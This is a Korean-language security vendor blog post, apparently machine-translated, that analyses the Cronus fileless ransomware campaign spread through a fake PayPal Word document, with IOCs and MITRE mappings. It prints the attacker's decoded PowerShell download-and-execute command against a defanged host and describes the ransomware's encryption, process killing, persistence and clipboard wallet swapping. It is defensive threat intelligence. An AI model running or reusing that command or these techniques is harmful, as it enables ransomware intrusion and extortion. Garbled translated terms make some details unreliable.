• 제품 & 서비스
        • 클라우드

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 모바일 장치 관리
          • BYOD
          • 확장 된 탐지 및 대응
          • 제로 트러스트 네트워크 액세스
          • 데이터 개인 정보
        • 온프레미스

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 데이터 개인 정보
        • 플랫폼

          • 악성코드 분석 플랫폼
        • 소기업

          • SOHO 토탈 에디션
        • 서비스

          • 위협 인텔
          • 디지털 위험 보호 서비스(DRPS)
          • 랜섬웨어 복구 서비스(RRaaS)
          • DPDP 준수
          • 관리되는 탐지 및 대응
  • 솔루션
    • BFSI
    • 교육
    • Government
    • 의료
    • ITeS
    • 제조업
  • 회사
    • Seqrite 소개
    • Leadership
    • 수상 및 인증
    • 뉴스 편집실
  • 파트너
    • 파트너 프로그램
    • 파트너 찾기
    • 파트너가 되십시오
  • 고객 지원
  • 리소스
    • 블로그
    • 백서
    • 데이터시트
    • 고객 사례
    • 위협 보고서
    • 매뉴얼
    • POV
    • 데이터 개인 정보 보호 이해
    • DPDP 대화
정보 기술, 네트워크 및 사이버 보안 관련 블로그 | Seqrite Blog
영업팀에 문의
  • 제품 & 서비스
        • 클라우드

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 모바일 장치 관리
          • BYOD
          • 확장 된 탐지 및 대응
          • 제로 트러스트 네트워크 액세스
          • 데이터 개인 정보
        • 온프레미스

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 데이터 개인 정보
        • 플랫폼

          • 악성코드 분석 플랫폼
        • 소기업

          • SOHO 토탈 에디션
        • 서비스

          • 위협 인텔
          • 디지털 위험 보호 서비스(DRPS)
          • 랜섬웨어 복구 서비스(RRaaS)
          • DPDP 준수
          • 관리되는 탐지 및 대응
  • 솔루션
    • BFSI
    • 교육
    • Government
    • 의료
    • ITeS
    • 제조업
  • 회사
    • Seqrite 소개
    • Leadership
    • 수상 및 인증
    • 뉴스 편집실
  • 파트너
    • 파트너 프로그램
    • 파트너 찾기
    • 파트너가 되십시오
  • 고객 지원
  • 리소스
    • 블로그
    • 백서
    • 데이터시트
    • 고객 사례
    • 위협 보고서
    • 매뉴얼
    • POV
    • 데이터 개인 정보 보호 이해
    • DPDP 대화
홈  /  테크니컬  / Cronus의 정체를 폭로하다: PowerShell을 통해 가짜 PayPal 문서가 파일리스 랜섬웨어를 유포하는 방식
Cronus의 정체를 폭로하다: PowerShell을 통해 파일리스 랜섬웨어를 유포하는 가짜 PayPal 문서
06 XNUMX 월 2024

Cronus의 정체를 폭로하다: PowerShell을 통해 파일리스 랜섬웨어를 유포하는 가짜 PayPal 문서

Written by 수바지트 싱하
수바지트 싱하
테크니컬

Seqrite Labs APT-Team은 최근 가짜 PayPal 미끼를 이용한 여러 캠페인을 발견했습니다. 이 캠페인은 Cronus라는 새로운 변종 랜섬웨어를 통해 전 세계 개인을 표적으로 삼고 있습니다. 이 경우, 해당 랜섬웨어는 PowerShell로 개발되었으며 디스크에 악성 콘텐츠를 기록하지 않고 메모리에서 직접 실행됩니다.  

이 블로그에서는 원격 분석 과정에서 발견한 캠페인의 정교함과 기술적 세부 사항을 살펴보겠습니다. 초기 문서 페이로드부터 시작하여 이 캠페인의 여러 단계를 살펴보겠습니다. 그런 다음 악성 VBA 스크립트를 추출 및 분석하고 마지막으로 PowerShell 페이로드 반사 DLL 로딩을 사용하여 랜섬웨어를 실행합니다.  

초기 발견  

14년 2024월 XNUMX일, 저희 팀은 악성 문서를 발견했습니다. VirusTotal악성 내장 VBA 매크로가 포함된 파일에 사용하는 사냥 규칙에 따라 달라집니다. 

초기 분석 결과, 우리는 악의적인 미끼가 영수증 문서로 알려진 단순한 영수증 문서를 모방하는 것을 목표로 한다는 것을 발견했습니다. paypal_charges.doc. 그런 다음 악성 스트림에서 악성 매크로를 추출한 후 악성 VBA가 2단계 PowerShell 기반 로더를 다운로드하고 있음을 발견했습니다. 8eef4df388f2217caec3dc26.ps1반사 로딩 기술을 사용하여 랜섬웨어 기반 DLL을 로드했습니다.  

NETWALKER를 비롯한 여러 랜섬웨어 그룹은 이전에 이 기술을 사용하여 랜섬웨어를 배포했습니다. 

감염 사슬

기술 분석   

분석을 세 부분으로 나누어 보겠습니다.  

초기 감염 – 악성 문서  

저희는 초기 감염이 주로 피싱 경로를 통해 확산된 악성 Word 문서에 의해 발생했다는 것을 처음 확인했습니다. 따라서 악성 매크로 스트림을 분석하기 전에 해당 미끼의 내용을 심층적으로 분석하기로 했습니다. 

해당 문서 파일은 빈 Word 문서에 불과하다는 점에서 위협 행위자의 성숙도를 잘 보여줍니다. 따라서 저희는 이 악성 문서의 악의적인 흐름을 심층 분석하고 추가 분석을 위해 신속하게 추출하기로 결정했습니다. 

내장된 매크로의 작동 방식을 파악한 결과, 불필요한 주석과 변수 이름으로 인해 난독화가 심해 분석이 더욱 어렵다는 것을 발견했습니다. 그래서 VBA 매크로의 난독화를 해제하기로 했습니다. 난독화 해제된 매크로는 다음과 같습니다. 

//디코딩된 Base64 명령.   

IEX (New-Object Net.WebClient).DownloadString(‘hxxps[:]//eternal[.]lol/file/8e53a3e023218a9b1ef9ba1ef3b5afd191a99156b77864558d/8eef4df388f2217caec3dc26[.]jpg’);  

해당 매크로가 powershell.exe를 사용하여 Base64로 인코딩된 문자열을 인수로 실행한 것은 분명했습니다. 내용을 디코딩해 보니 서버에서 XNUMX단계 페이로드를 다운로드하려 했던 것으로 드러났습니다. 

두 번째 단계 – 악성 PowerShell 로더  

파일 확장자는 .JPEG인데 파일 형식은 PowerShell 파일인 것을 확인했습니다. 그래서 악성 PowerShell 로더를 신속하게 분석하기로 했습니다. 

예상대로 두 번째 단계는 정크 코드로 심하게 난독화되어 분석이 어렵습니다. 따라서 분석가의 편의성을 높이기 위해 정크 코드를 제거하고 정크 코드 사용 패턴을 관찰하여 PowerShell 스크립트의 난독화를 수동으로 해제하기로 했습니다. 

스크립트는 다음과 같은 시퀀스 세트를 포함하는 세 겹의 정크 코드를 사용하여 난독화되었습니다.  

if ($a.ProcessName -like “junkcodesequenceone”){  

...여기에 정크 코드가 있습니다... 

...여기에 정크 코드가 있습니다... 

...여기에 정크 코드가 있습니다... 

} 

if ($a.ProcessName -like “junkcodesequencetwo”){  

...여기에 정크 코드가 있습니다... 

...여기에 정크 코드가 있습니다... 

...여기에 정크 코드가 있습니다... 

} 

..실제 PowerShell 스크립트… 

if ($a.ProcessName -like “junkcodesequencethree”){  

...여기에 정크 코드가 있습니다... 

...여기에 정크 코드가 있습니다... 

...여기에 정크 코드가 있습니다... 

} 

실제 PowerShell 코드를 살펴보면 파일에 2바이트 배열이 포함되어 있음을 알 수 있습니다. 포함 .NET 어셈블리는 반사 로딩을 사용하여 메모리에 추가로 압축됩니다. 마지막 단계는 악성 .NET 어셈블리입니다. 포함 랜섬웨어. 

최종 단계 - 악성 .NET 어셈블리 

두 번째 단계에서 추출한 악성 .NET 어셈블리를 살펴보겠습니다. 추출 후, DLL을 Detect-It-Easy(DIE) 도구에 로드하여 패킹되었거나 보호된 .NET 어셈블리 파일을 식별했습니다. 

우리는 첫 번째 .NET 어셈블리가 .NET Reactor를 사용하여 보호된다는 것을 발견했으므로 다음을 결정했습니다. 풀다 it 및 탐색 어셈블리 파일 추가 사용 전에, dn스파이 공구 a 자세한 코드 개요. 

첫 번째 DLL 파일인 TEStxx.dll을 압축 해제한 후 로드된 어셈블리를 발견했습니다. 책임이있는 프로세스 주입을 수행합니다. 이 경우 두 번째 실행 파일인 RegSvcs.exe를 프로세스의 메모리에 주입합니다. 따라서 이제 조사 두 번째 악성 .NET 실행 파일입니다. 

이 최종 실행 파일의 Main 메서드를 살펴보면 코드가 바탕 화면 변경과 같은 랜섬웨어 기반 동작과 관련된 다양한 작업을 수행하는 것을 볼 수 있습니다. 열거 특정 파일을 암호화하고 종료 중 실행 중인 프로세스. 

또한, 우리는 다음과 같은 방법을 볼 수 있습니다. 트리플 암호화, 전체 암호화 재귀적 디렉토리 모양, 예외 파일 그리고 흥미로운 것들이 많이 있습니다. 따라서 이 랜섬웨어의 몇 가지 흥미로운 기능을 살펴보겠습니다.  

셀프 카피  

랜섬웨어 바이너리는 자체를 복사합니다. C:\사용자\ \AppData\로컬 경로에 있으며, 바이너리가 이미 존재하거나 복사된 경우, 해당 위치로 복사를 완료하면 자동으로 삭제됩니다. 

열거  

랜섬웨어는 로컬 디스크 드라이브를 먼저 열거한 후, 드라이브 내부에 있는 파일을 열거합니다. 또한 특정 폴더를 확인합니다. \체계\ 디렉터리를 만들고 제외합니다. 그런 다음 재귀적 디렉터리 조회를 위한 새 작업을 생성합니다. 

암호화 대상 파일 유형은 아래와 같습니다.  

.마이드  .ndf  .qry  .sdb  .sdf  .tmd  . tgz 
.lzo  이 .txt  .JAR  .DAT  .연락하다  .설정  .DOC 
.을 Docx  . XLS  . XLSX  는 .ppt  . Pptx  .odt  . JPG 
.mka  .mhtml  .oqy  .PNG  .CSV  .py  .SQL 
.indd  .cs  . Mp3  . Mp4  .dwg  .지퍼  .RAR 
. 운동  . RTF 형식  .BMP  .mkv  . AVI  의 .apk  .LNK 
.디브  .Dec  .DIF  .mdb  . PHP는  .ASP  . 영문 
.html 중에서  .HTM  . XML  .PSD  .PDF  .xla  .견습생 
.대  .divx  .iso로  .7zip  .pdb  . 이코  .우선권 
.db  .WMV  .swf  .cer  박  .지원  .accdb 
.만  .p7c  .exif  .vss  .노골적인  .m4a  . WMA를 
.ace  .arj  . Bz2  .CAB  .gzip  .lzh  .타르 
.JPEG  .xz  .는 MPEG  토렌트  .MPG  .핵심  .FLV 
.시  .합집합  .아이뱅크  .지갑  . CSS  . JS  .rb 
.crt  .xlsm  .xlsb  . 7z  .cpp  .자바  .jpe 
. 초기  .얼룩  에서 .wps  .docm  . WAV  .3gp  . 지프 
.LOG  .gz  .config  .vb  .m1v  .sln  .pst 
.obj  .xlam  .djvu  .inc  .cvs  .DBF  .티비 
.wpd  .점  .dotx  .webm  .m4v  .amv  .m4p 
.svg  .ODS  .bk  .vdi  .vmdk  .onepkg  .accde 
.jsp  .json  .xltx  .vsdx  .uxdc  .udl  .3ds 
.3프랑  .3g2  .accda  .accdc  .accdw  .adp  .일체 포함 
.ai3  .ai4  .ai5  .ai6  .ai7  .ai8  .arw 
.ascx  .asm  .asmx  .avs  .BIN  .cfm  .dbx 
.dcm  .dcr  .픽트  .rgbe  .dwt  .f4v  .exr 
.kwm  .최대  .mda  .mde  의 .mdf  .mdw  이 .mht 
.mpv  .메시지  .myi  .nef  .odc  .geo  .스위프트 
.odm  .odp  .자주  .orf  .PFX  .p12  .pl로 
.pls  .안전한  .탭  .VBS  .xlk  .xlm  .xlt 
.xltm  .svgz  된 .slk  .tar.gz  에 .dmg  .추신  .psb 
.tif  .rss  .KEY  .vob  .엡스피  .dc3  .iff 
.고르다  .onetoc2  .nrw  .pptm  .팟엑스  .포트엠  .냄비 
.xlw  .xps  .xsd  .xsf  .xsl  .kmz  .accdr 
.stm  .accdt  .ppam  .pps  .ppsm  .1cd  .p7b 
.wdb  .sqlite  .sqlite3  .dacpac  .zipx  .lzma  .z 
.tar.xz  .pam  .r3d  .오바  .1c  .디티  .c 
.vmx  .xhtml  .ckp  .db3  .dbc  .dbs  .dbt 
.dbv  .frm  .mwb  .mrg  .txt  .vbox  .wmf 
의 .wim  .xtp2  .xsn  .xslt       

암호화  

랜섬웨어 바이너리는 파일 크기에 따라 두 가지 유형의 암호화 방식을 사용합니다. 512KB 미만의 파일의 경우, FULL_ENCRYPT 방식은 파일을 한 번에 암호화합니다. 512KB를 초과하는 파일의 경우, TRIPLE_ENCRYPT 방식은 파일 내용을 여러 부분으로 나누어 암호화합니다. 두 방식 모두 AES 암호화 방식을 사용하여 파일을 암호화합니다. 

위의 파일들을 제외하고 암호화하는 작은 EXCEPTIONAL_FILE이 추가됩니다. 암호화를 수행하는 동안 다음과 같은 이름의 파일이 포함된 랜섬웨어 경고 메시지도 생성됩니다. 크로누스.txt. 

프로세스 종료  

랜섬웨어 바이너리는 실행 중인 모든 프로세스를 나열한 후 메인 창을 종료하여 여러 프로세스를 종료합니다. 종료된 프로세스 목록은 다음과 같습니다.  

SQLWriter  sqbcoreservice  버추얼박스VM  SQL에이전트  SQL브라우저  SQLSERV  암호 
증기  주올즈  아그네스브이씨  파이어폭스 설정  인포패스  동기화 시간  VBoxSVC 
티버드컨피그  박쥐  더뱃64  isqlplussvc  마이데스크탑서비스  mysqld를  오씨에스디 
OneNote  엠스펍  마이데스크탑qos  CNTAoSMgr  엔트르츠캔  VM플레이어  신탁 
시야  powerpnt  WPS  xfssvccon  프로세스해커  디벵50  디비에스엔엠피 
엔씨에스비씨  뛰어나다  티엠리스텐  PccNTMon  mysqld-nt  mysqld-opt  오쿠토업디즈 
오컴  MSACCESS  msftesql  천둥새  Visio가  윈 워드  워드 패드 
mbamtray             

위의 모든 프로세스를 성공적으로 종료한 후 다시 호출합니다. 모든 드라이브 특정 파일을 추가로 열거하고 암호화하는 방법입니다.  

고집  

랜섬웨어 바이너리는 유명한 런키스 지속성을 위해 새 키를 추가하므로 크로누스 바이너리를 실행하는 위의 레지스트리 하이브에 RegSvcs.exe 시작에. 

데이터 조작  

랜섬웨어는 클립보드의 내용을 열거합니다. 클립보드에서 비트코인 ​​주소를 찾으면 이를 공격자의 BTC 지갑 주소로 대체하고, 이 주소로 몸값을 요구합니다. 

몸값 요구서에는 BTC 지갑 주소가 강조되어 있습니다., ...에 조사, 전환 밖으로 비어있다. 

코드 중복   

다른 악성 소프트웨어 샘플을 조사하고 연구한 결과, 이 캠페인에 사용된 DLL 인젝터인 PowerShell 로더에 있는 코드가 다음과 같이 다른 활성 파일리스 악성 소프트웨어 캠페인과 겹친다는 결론을 내릴 수 있습니다. 

  • 복수 쥐 
  • 화살 쥐 
  • 비동기 RAT 
  • 안드로메다 RAT 
  • 엑스웜 
  • NRAT 

맺음말  

파일리스 악성코드 변종인 크로누스 랜섬웨어는 매우 새로운 변종이며 활발하게 확산되고 있습니다. 위의 공격 방식은 현재 다양한 대상 컴퓨터에 랜섬웨어를 유포하는 데 주로 사용되는 방식입니다. 

Seqrite 보호 

  • 스크립트.크로노스.48939.GC 
  • OLE.크로누스.48940.GC 
  • 몸값.크로누스 
  • 트로이 목마 인젝터 

IOC 

해시[SHA-256]  파일 이름 
69b6bc4db69680118781e7a9f2580738088930fa04884755f23904fa19e638e3  페이팔_요금.doc 
9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb  페이팔_요금.doc 
afb95b1b2092020ed98312602c300f51daca14bb3d65503df3c5ca4776027987  ~WRL003.tmp 
629587e592130b86418d17d6b8cc52b6f378f39f1b5e8caa4038cfa7120b2a53  8eef4df388f2217caec3dc26.ps1 

  

dd78c6dc62463aba24cdbea3968cbcc1c7b97a736ef069d99d6512b10c5e91f3  TEStxx.dll 
42551531be1c5abfdd24a3465788c659a038141de61976787b0862664df95aad  p000.exe 

 

URL이 
hxxps://eternal[.]lol/파일/ 

MITER ATT & CK 

술책   기술 ID  이름  
초기 액세스  T1566.001  피싱: 스피어 피싱 첨부 파일 
실행  T1204.002 

T1059.001 

T1059.005 

사용자 실행: 악성 파일 

명령 및 스크립팅 인터프리터: PowerShell 

명령 및 스크립팅 인터프리터: Visual Basic 

고집  T1547.001  레지스트리 실행 키/시작 폴더 
방어 회피  T1027.010
T1620
T1055.012 
명령 난독화
반사 코드 로딩
프로세스 홀로잉 
발견  T1057
T1083 
프로세스 발견
파일 및 디렉토리 검색 
영향  T1486
T1491.001
T1565.002 
충격에 대비해 데이터를 암호화했습니다.
훼손: 내부 훼손
데이터 조작: 전송된 데이터 조작 

참여자 

  • 수바지트 싱하 
  • 사트윅 람 프라키  

 이전 포스트최근 IT 서비스 중단으로 인한 손실은 얼마나 될 것으로 추산되나요?
다음 포스트  EDR 솔루션을 사용하는 다양한 이점과 사용 사례
수바지트 싱하

Subhajeet Singha 소개

Subhajeet은 Quick Heal의 보안 연구소에서 보안 연구원으로 일하고 있습니다. 그의 주요 분야는 위협 인텔리전스, 연구, 그리고 리버스 엔지니어링입니다.

Subhajeet Singha의 기사 »

관련 게시물

  • Operation DualScript – 암호화폐 및 금융 활동을 표적으로 삼는 다단계 PowerShell 악성코드 공격 캠페인

    Operation DualScript – 암호화폐 및 금융 활동을 표적으로 삼는 다단계 PowerShell 악성코드 공격 캠페인

    2026 년 3 월 31 일
  • 동형 문자 공격: 유사한 문자를 이용한 사이버 사기

    2026 년 3 월 30 일
  • 카멜클론 작전: 지역적 긴장 속에서 정부 및 국방 기관을 겨냥한 다지역 첩보 작전

    2026 년 3 월 13 일
추천 작가
  • 시크라이트
    시크라이트

    Seqrite는 선도적인 기업용 사이버 보안 솔루션 제공업체입니다.

    더 읽기 ..
  • 조티 칼레카르
    조티 칼레카르

    저는 새로운 기술과 관련된 콘텐츠를 만드는 것을 좋아하는 열렬한 작가입니다.

    더 읽기 ..
  • 비니쉬 P
    비니쉬 P

    저는 열정적인 사이버 보안 애호가이자 헌신적인 작가입니다. 재능을 가진...

    더 읽기 ..
  • 산제이 카트카르
    산제이 카트카르

    산제이 카트카르는 Quick Heal Technologies의 공동 전무이사입니다.

    더 읽기 ..
이상의 주제
적절한 (25) 사이버 공격 (36) 사이버 공격 (58) 사이버 공격 (16) 사이버 공격 (15) 사이버 보안 (336) 사이버 보안 (34) 사이버 위협 (33) 사이버 위협 (50) 데이터 위반 (56) 데이터 유출 (29) 데이터 손실 (28) 데이터 손실 방지 (34) 데이터 프라이버시 (15) 데이터 보호 (32) 데이터 보안 (17) DLP (50) DPDP (14) 디피디파 (16) 암호화 (16) 엔드 포인트 보안 (110) 엔터프라이즈 보안 (18) 공적 (13) GDPR (13) 악성 코드 (76) 악성 코드 분석 (13) 악성 코드 공격 (23) 맬웨어 공격 (12) MDM (27) Microsoft (15) 네트워크 보안 (25) 패치 관리 (12) 피싱 (30) 랜섬 (69) 중매 공격 (30) ransomware 공격 (30) 중매 보호 (14) 시크라이트 (41) Seqrite 암호화 (27) 시크라이트 EPS (33) Seqrite 서비스 (16) 그래프 기반 사이버 위협 인텔리전스 (14) UTM (34) 보안 문제 (16) 제로 트러스트 (13)
정보 기술, 네트워크 및 사이버 보안 관련 블로그 | Seqrite

전 세계적으로 최고 수준의 위협 예방, 탐지 및 대응 솔루션을 제공하여 엔드포인트, 데이터 및 네트워크 보안을 간소화하는 선도적인 기업 IT 보안 솔루션 제공업체입니다.

자세히 보기

우리를 따르십시오 :

우리의 뉴스 레터를 구독

최신 사이버보안 동향과 통찰력을 알아보세요.

로딩중
제품 & 서비스
  • 클라우드
  • 엔드 포인트 보호
  • 엔드 포인트 탐지 및 대응
  • 모바일 장치 관리
  • BYOD
  • 확장 된 탐지 및 대응
  • 제로 트러스트 네트워크 액세스
  • 데이터 개인 정보
  • 온프레미스
  • 엔드 포인트 보호
  • 엔드 포인트 탐지 및 대응
  • 데이터 개인 정보
  • 플랫폼
  • 악성코드 분석 플랫폼
  • 마이크로 비즈니스
  • SOHO 토탈 에디션
  • 서비스
  • 위협 인텔
  • 디지털 위험 보호 서비스(DRPS)
  • 랜섬웨어 복구 서비스(RRaaS)
  • DPDP 준수
  • 관리되는 탐지 및 대응
리소스
  • 블로그
  • 백서
  • 데이터시트
  • 위협 보고서
  • 매뉴얼
  • POV
  • 데이터 개인 정보 보호 이해
  • DPDP 대화
  • 정책 및 규정 준수
  • EULA
  • 고딥.AI
  • SIA
문의하기
  • 등록 사무소
  • 가장 가까운 사무실
  • 사이버 보안에 대해 이야기해 봅시다
고객 지원
  • 기술 지원
  • 소프트웨어 다운로드
  • 오프라인 업데이터
  • 펌웨어 업그레이드
  • 업그레이드
  • 제품 설명서
브랜드 소개
  • Seqrite 소개
  • Leadership
  • 어워드 수상
  • 뉴스 편집실
되어보세요
  • 파트너 프로그램
  • 파트너 찾기
  • 파트너가 되십시오
  • Seqrite 인증

© 2026 퀵힐테크놀로지스 주식회사

사이트 맵 개인 정보 보호 정책 법적 고지 쿠키 정책 이용 약관